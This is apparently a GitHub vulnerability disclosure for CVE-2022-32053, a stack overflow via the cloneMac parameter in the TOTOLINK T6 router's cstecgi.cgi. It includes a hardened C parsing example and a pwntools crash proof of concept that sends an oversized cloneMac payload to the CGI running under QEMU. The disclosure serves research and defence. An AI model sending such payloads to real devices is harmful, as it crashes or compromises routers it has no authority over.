CVE-2022-32053: IoT-vuln/Totolink/T6-v2/6.setWizardCfg at main · d1tto/IoT-vuln

TOTOLINK T6 V4.1.9cu.5179_B20201015 was discovered to contain a stack overflow via the cloneMac parameter in the function FUN_0041621c.


The vulnerability exists in the router's web component, /web_cste/cgi-bin/cstecgi.cgi. The function FUN_0041621c (at address 0x41621c) reads the JSON parameter cloneMac and, without checking its length, copies it directly into local variables on the stack, causing a stack overflow.

When the parameter proto equals 1, the program enters the dangerous if branch at line 125. It then reads the cloneMac parameter, splits it, and concatenates the segments into local variables on the stack without checking their length.
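The defect described above is the missing length check before the split-and-copy into fixed stack storage. The following is an added example of how such a parameter should be handled, written for this page and not taken from the TOTOLINK firmware: the value is length-bounded and format-checked in full before a single byte is written to the caller's six-byte buffer, so an oversized cloneMac (such as the 0x400-byte string used in the PoC below) is rejected rather than copied. Function names, the 17-character colon-separated MAC format, and the sample inputs are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

#define MAC_TEXT_LEN 17   /* "xx:xx:xx:xx:xx:xx" */
#define MAC_OCTETS   6

/* Length scan that never reads beyond max bytes, so an untrusted value of
 * arbitrary size is not walked to its end before being rejected. */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Hex digit to value, or -1 for any non-hex character. */
static int hexval(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Hypothetical hardened parser for a cloneMac-style parameter (added example).
 * Returns 0 and fills out[6] on success, -1 on any malformed or oversized
 * input. The output buffer is untouched on failure. */
int parse_clone_mac(const char *in, unsigned char out[MAC_OCTETS])
{
    if (in == NULL)
        return -1;

    /* Reject before copying: exactly 17 characters, no more, no less. */
    if (bounded_len(in, MAC_TEXT_LEN + 1) != MAC_TEXT_LEN)
        return -1;

    unsigned char tmp[MAC_OCTETS];
    for (int i = 0; i < MAC_OCTETS; i++) {
        const char *p = in + i * 3;          /* start of group i */
        int hi = hexval(p[0]);
        int lo = hexval(p[1]);
        if (hi < 0 || lo < 0)
            return -1;
        if (i < MAC_OCTETS - 1 && p[2] != ':') /* separator after groups 0..4 */
            return -1;
        tmp[i] = (unsigned char)((hi << 4) | lo);
    }
    memcpy(out, tmp, MAC_OCTETS);
    return 0;
}

/* Convenience wrapper: parse and return octet idx (0..5), or -1 if rejected. */
int clone_mac_octet(const char *in, int idx)
{
    unsigned char mac[MAC_OCTETS];
    if (idx < 0 || idx >= MAC_OCTETS)
        return -1;
    if (parse_clone_mac(in, mac) != 0)
        return -1;
    return mac[idx];
}

/* Builds the same shape of value as the PoC below (0x400 'A's, ':', 'A')
 * as a constructed sample and returns 1 if the parser rejects it. */
int poc_payload_rejected(void)
{
    char big[0x400 + 3];
    memset(big, 'A', 0x400);
    big[0x400] = ':';
    big[0x401] = 'A';
    big[0x402] = '\0';
    unsigned char mac[MAC_OCTETS];
    return parse_clone_mac(big, mac) != 0;
}

int main(void)
{
    unsigned char mac[MAC_OCTETS];
    const char *ok = "00:11:22:aa:BB:cc";   /* constructed sample */
    printf("%s -> %s\n", ok, parse_clone_mac(ok, mac) == 0 ? "accepted" : "rejected");
    printf("oversized PoC-style value -> %s\n",
           poc_payload_rejected() ? "rejected" : "ACCEPTED (bug)");
    return 0;
}
```

The order of checks is the point: length first, then format, then a single copy into the caller's buffer only after everything has passed. A parser that splits on ':' first and copies each segment as it goes is exactly the pattern that lets an unbounded segment run past a stack local.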

from pwn import *
import json

# Crash PoC: an oversized cloneMac value (0x400 bytes before the ':') sent
# with proto set to "1" so the vulnerable branch is taken.
data = {
    "topicurl": "setting/setWizardCfg",
    "proto": "1",
    "cloneMac": "A" * 0x400 + ":" + "A",
}

data = json.dumps(data)
print(data)

# Run the CGI under user-mode QEMU (MIPS little-endian) with a gdb stub on
# port 1234, supplying the CGI environment it expects.
argv = [
    "qemu-mipsel-static", "-g", "1234", "-L", "./root/",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecgi.cgi",
]

a = process(argv=argv)
a.sendline(data.encode())

a.interactive()
